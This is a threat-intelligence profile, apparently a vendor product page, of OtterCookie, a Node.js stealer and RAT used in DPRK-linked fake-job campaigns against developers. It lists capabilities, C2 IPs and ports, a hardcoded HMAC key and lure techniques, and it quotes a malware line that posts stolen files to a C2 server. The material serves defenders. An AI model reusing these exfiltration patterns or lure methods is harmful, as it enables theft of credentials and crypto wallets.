OtterCookie
OtterCookie is a JavaScript/Node.js malware family used in DPRK-linked developer-targeting operations associated with Lazarus ecosystem activity, including Contagious Interview/DeceptiveDevelopment and reporting on HexagonalRodent/Famous Chollima overlap. Multiple sources describe it as a distinct Node.js RAT rather than a BeaverTail variant, although some reporting also characterizes it as a BeaverTail-like stealer or an evolution used by some DeceptiveDevelopment teams. It is commonly deployed alongside BeaverTail and InvisibleFerret in phased intrusion chains targeting software developers, especially Web3, cryptocurrency, and DeFi developers, via fake job offers, trojanized coding assessments, malicious npm packages, trojanized open-source projects, and at least one compromised VSCode extension (fast-draft).
Observed capabilities include continuous collection from active developer workstations, including clipboard contents, keystrokes, screenshots, browser secrets, wallet artifacts, developer credentials, and reverse-shell/remote-access functionality. Reporting also describes browser credential theft, recursive file exfiltration for sensitive wallet and credential material, and active workspace monitoring on a 30-second interval. OtterCookie command-and-control has been observed using Socket.IO over Engine.IO v4, maintaining a live roster of connected victims and broadcasting victim state periodically. Infrastructure linked in reporting includes 195.201.104.53, where port 6931 operated as a live OtterCookie Socket.IO C2 broadcasting victim state every 30 seconds and port 6101 appeared to be a predecessor or reserve C2, and 216.126.225.243, described in the content as a known DPRK OtterCookie C2. In one analyzed Node.js stealer sample associated in the content with OtterCookie infrastructure, browser theft was sent to port 8085, file uploads to port 8086, and host registration/C2 and reverse-shell traffic to port 8087; the sample beaconed to /api/notify and /upload and contained the plaintext HMAC-SHA256 key "SuperStr0ngSecret@)@^".
Targeting in the provided content is concentrated on developers globally, particularly those involved in cryptocurrency projects, Web3, and DeFi. Associated campaigns use LinkedIn recruiter lures, fake companies, bogus interviews, ClickFix-style prompts, and malicious coding challenges. OtterCookie is repeatedly linked with DPRK-attributed operations and Lazarus-related clusters, and the content places it within a broader malware ecosystem shared across multiple North Korean-linked teams.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
9 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
At the end of 2024, a BeaverTail-like stealer named OtterCookie appeared, believed to be an evolution used by some DeceptiveDevelopment teams.
Post lazarusholic lazarusholic.bsky.social did:plc:iqisolaecmif2zmpfbmsq2te "Hunting Lazarus Part IX: The Google Mirror" published by RedAsgard. #BeaverTail, #OtterCookie, #DPRK, #CTI
The campaign targeted Web3 and decentralised finance (DeFi) developers globally via AI-generated fake job offers delivered through LinkedIn, using three interoperating malware families BeaverTail, OtterCookie, and InvisibleFerret in a phased infection chain that begins with a malicious coding assessment and culminates in full credential exfiltration and wallet drainage.
The campaign targeted Web3 and decentralised finance (DeFi) developers globally via AI-generated fake job offers delivered through LinkedIn, using three interoperating malware families BeaverTail, OtterCookie, and InvisibleFerret in a phased infection chain that begins with a malicious coding assessment and culminates in full credential exfiltration and wallet drainage.
Figure 3. Example of emoji use in Coral Sleet AI-assisted payload snippet for the OtterCookie malware
The attacker-owned GitHub repositories often contain simple, obfuscated code for downloading BeaverTail or OtterCookie malware.
In Contagious Interview campaign, Team 8 has been mainly using OtterCookie. Starting around December 2025, Team 8 started using new malware.
The latest malicious npm packages deliver a variant of the OtterCookie malware, which combines BeaverTail malware and prior versions of OtterCookie, according to Socket. BeaverTail is malware that often serves as a downloader of further payloads, while OtterCookie is a multistage infostealer and RAT.
Select infection chains have also been found to serve another malware codenamed OtterCookie via the same JavaScript payload used to launch BeaverTail.
Techniques & procedures
28 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
3 techniquesOtterCookie was not only a tool for victims who had been personally walked through a fake interview. It also sat behind package infrastructure... document an OtterCookie-attributed wave of malicious npm packages staged behind Vercel-hosted payload delivery.
using three interoperating malware families BeaverTail, OtterCookie, and InvisibleFerret in a phased infection chain that begins with a malicious coding assessment
The interview lure was hand-tailored. The npm pipe was industrial. Both fed the same RAT.
Execution
3 techniquesFinally, the third module implements a WebSocket connection to the C2 server (port 8087) with reverse-shell capabilities.
It is a JavaScript implant. It targets macOS. It uses Socket.IO as its command-and-control protocol...
using three interoperating malware families BeaverTail, OtterCookie, and InvisibleFerret in a phased infection chain that begins with a malicious coding assessment
Persistence
2 techniquesFive trojanized browser extensions – Bitwarden, Phantom, TronLink, Trust Wallet, and a Brave/MetaMask-themed trojan – share a single boot sequence.
Privilege Escalation
1 techniqueStealth
1 techniqueThe obfuscation technique looks typical to the code produced by obfuscation.io... We are facing a very long array of small Base64-encoded strings... only the “wrapper” that is responsible for the execution is obfuscated but the malicious payloads are embedded in plain text.
Credential Access
7 techniquesOtterCookie was reading clipboard contents, capturing keystrokes, taking screenshots, watching the active workspace on a thirty-second clock.
Collection class Behavior Keystrokes System-wide key capture across analyzed samples – not limited to browser input.
Collection class Behavior Developer secrets .env files, SSH material, cloud credentials, source-control tokens, and adjacent on-disk secrets.
Collection class Behavior Browser data Credential and cookie theft consistent with the broader Contagious Interview campaign.
Collection class Behavior Developer secrets .env files, SSH material, cloud credentials, source-control tokens, and adjacent on-disk secrets.
The first one is a browser credential stealer. It supports: Chrome, Brave, Edge, Opera, Opera GX, Vivaldi, Kiwi, Yandex, Iridium, Comodo Dragon, SRWare Iron, Chromium, AVG Browser.
The second one is a recursive file exfiltration scanner. It scans the victim’s filesystem and search for sensitive files by name/extension... '.pem', '.p12', '.pfx', '.jks', '.keys', '.cer', '.crt', '.cert', '.der'
Discovery
3 techniquesThe attack culminates with the deployment of a RAT that can gather system information, enumerate files and directories, list running processes.
The attack culminates with the deployment of a RAT that can gather system information, enumerate files and directories, list running processes.
The attack culminates with the deployment of a RAT that can gather system information, enumerate files and directories, list running processes.
Collection
5 techniquesBeaverTail is an infostealer and downloader that collects data from cryptocurrency wallets, keychains, and saved browser logins.
OtterCookie was reading clipboard contents, capturing keystrokes, taking screenshots, watching the active workspace on a thirty-second clock.
Collection class Behavior Keystrokes System-wide key capture across analyzed samples – not limited to browser input.
OtterCookie was reading clipboard contents, capturing keystrokes, taking screenshots, watching the active workspace on a thirty-second clock.
OtterCookie was reading clipboard contents, capturing keystrokes, taking screenshots, watching the active workspace on a thirty-second clock.
Command and Control
5 techniquesFinally, the third module implements a WebSocket connection to the C2 server (port 8087) with reverse-shell capabilities.
All HTTP communications are performed via the Axios NPM package... const response = await axios.post(`hxxp://216[.]126[.]225[.]243:8086/upload`, form... Upon the first connection the following info is sent to the C2 via a POST request to hxxp://216[.]126[.]225[.]243:8087/api/notify
...leverage legitimate hosting services like Vercel.App as command and control servers.
Each extension reads it from a transaction payload on an Aptos mainnet account ... at runtime. ... The first thing each of the five extensions does on load is ask a public blockchain where its server is.
npm postinstall hooks fetching payloads from Vercel-hosted staging domains Inspect package install logs and package-lock graphs.
Exfiltration
1 techniqueData is exfiltrated to port 8085... Interesting files are exfiltrated via port 8086... Upon the first connection the following info is sent to the C2 via a POST request to hxxp://216[.]126[.]225[.]243:8087/api/notify... All communications (on different ports) are made with the IP address 216.126.225.243.
IOCs tracked for this family
92 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
84 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Post lazarusholic lazarusholic.bsky.social did:plc:iqisolaecmif2zmpfbmsq2te "Hunting Lazarus Part IX: The Google Mirror" published by RedAsgard. #BeaverTail, #OtterCookie, #DPRK, #CTI
A cross-platform Node.js malware targeting Windows (via WSL), macOS, and Linux. It includes three main payloads: a browser credential stealer, a recursive file exfiltration module for sensitive files and crypto-wallet data, and a WebSocket-based backdoor with reverse-shell capabilities. Data is exfiltrated to a C2 over ports 8085, 8086, and 8087.
Referenced as a cross-platform NPM stealer.
Node.js implant used to monitor the live workstation, including clipboard contents, keystrokes, screenshots, and active workspace activity.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.